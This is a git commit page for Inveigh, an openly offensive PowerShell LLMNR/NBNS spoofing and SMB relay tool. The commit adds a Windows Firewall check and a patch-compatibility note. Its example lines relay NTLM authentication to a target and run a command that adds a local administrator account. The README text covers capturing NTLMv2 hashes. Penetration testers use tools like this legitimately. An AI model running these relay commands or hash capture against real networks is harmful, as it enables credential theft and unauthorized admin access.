diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2016-08-02 21:47:26 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2016-08-02 21:47:37 -0400 |
| commit | 747b0d1f2fff960e378776a3cdcc9fd857a387dc (patch) | |
| tree | 097387f685648b4da5004d952109f7b5f288fbf7 | |
| parent | 3dbc469024b856ef1a76157b4bf57e348a2474f2 (diff) | |
| download | Inveigh-747b0d1f2fff960e378776a3cdcc9fd857a387dc.tar.gz Inveigh-747b0d1f2fff960e378776a3cdcc9fd857a387dc.zip | |
Windows Firewall check and readme update
Added a warning for when the Windows Firewall is enabled. Added a note
about the June patches likely breaking features of
Invoke-InveighBruteForce.
| -rw-r--r-- | README.md | 7 | ||||
| -rw-r--r-- | Scripts/Inveigh-BruteForce.ps1 | 13 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 15 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 16 |
4 files changed, 47 insertions, 4 deletions
@@ -73,7 +73,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire ### Invoke-InveighBruteForce -* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. +* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. ##### Privilege Requirements: * Regular User @@ -84,6 +84,9 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * Granular control of console and file output * Run time control +##### Notes: +* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working. + ##### Parameters: * __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host. * __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing. @@ -156,7 +159,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes * __Watch-Inveigh__ - Enable real time console output * __Clear-Inveigh__ - Clear Inveigh data from memory -* __Stop-Inveigh__ - Stop all running Inveigh functions +* __Stop-Inveigh__ - Stop all running Inveigh functions ## Miscellaneous Notes * The local LLMNR/NBNS services do not need to be disabled on the host system. diff --git a/Scripts/Inveigh-BruteForce.ps1 b/Scripts/Inveigh-BruteForce.ps1 index 5bdc181..2fa6cfd 100644 --- a/Scripts/Inveigh-BruteForce.ps1 +++ b/Scripts/Inveigh-BruteForce.ps1 @@ -285,6 +285,13 @@ else $inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")]) > $null +$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + +if($firewall_status) +{ + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null +} + if($NBNS -eq 'Y') { $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null @@ -445,6 +452,12 @@ if($inveigh.status_output) $inveigh.status_queue.RemoveRange(0,1) } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default { Write-Output($inveigh.status_queue[0]) diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index 70551b2..f8ce03e 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -87,7 +87,7 @@ Default = 0: (0,1,2) Enable/Disable features for better operation through extern Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire .EXAMPLE -Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add" +Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. @@ -234,6 +234,13 @@ if(!$inveigh.running) $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null + $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + + if($firewall_status) + { + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null + } + if($HTTP -eq 'Y') { $inveigh.HTTP = $true @@ -402,6 +409,12 @@ if($inveigh.status_output) $inveigh.status_queue.RemoveRange(0,1) } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default { Write-Output($inveigh.status_queue[0]) diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index da0cf55..1e5ea3f 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -223,7 +223,7 @@ Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; Execute specifying an HTTP redirect response. .EXAMPLE -Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add" +Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. @@ -478,6 +478,14 @@ else # Write startup messages $inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null + +$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + +if($firewall_status) +{ + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null +} + $inveigh.status_queue.Add("Listening IP Address = $IP") > $null $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null @@ -785,6 +793,12 @@ if($SMBRelay -eq 'N') $inveigh.status_queue.RemoveRange(0,1) } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default { Write-Output($inveigh.status_queue[0]) |